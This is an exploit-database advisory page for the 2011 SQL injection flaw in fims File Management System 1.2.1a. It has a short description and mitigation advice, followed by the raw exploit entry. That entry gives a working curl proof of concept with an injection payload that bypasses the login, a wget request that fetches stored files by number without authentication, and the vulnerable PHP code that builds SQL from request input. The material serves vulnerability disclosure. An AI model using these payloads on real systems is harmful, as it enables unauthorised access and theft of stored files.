fims - File Management System

vendor:

by:

Skraps

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: fims - File Management System

Affected Version From: 1.2.1a

Affected Version To: 1.2.1a

Patch Exists: NO

Related CWE: N/A

CPE: fims

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

fims – File Management System <= 1.2.1a SQL Injection and Vulnerability

An attacker can exploit a SQL injection vulnerability in fims - File Management System <= 1.2.1a by sending a crafted request with malicious data to the application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: fims - File Management System <= 1.2.1a SQL Injection and  Vulnerability
# Date: 2011-10-19
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://fims.codeplex.com/
# Version: 1.2.1a (tested)


---------------
PoC (POST or GET data)
---------------
curl --data "l=help@juno.com&password=word') or id=ABS('1" http://127.0.0.1/fims/?p=1
 
wget "http://127.0.0.1/fims/index.php?f={anyfile number}"

---------------
Vulnerable code
---------------
Line 18 of index.php:
  if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
Line 117 of functions.php:
        function login($db, $email, $password)
        {
                $rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
                if ($db->numrows($rs)>0) return true;
                else return false;
        }

Line 51 of index.php:
                if (isset($_REQUEST[f]))
                {
                        assert(is_numeric($_REQUEST[f]));
                        $file = get_file_data($g_db, $_REQUEST[f]);
                        header("Accept-Ranges: bytes");
                        header("Content-Length: ".filesize("files/".$file[id]));
                        header("Content-Type: {$file[mime]}");
                        header("Content-Disposition: inline; filename=\"{$file['label']}\";");
                        readfile("files/".$file[id]);
                }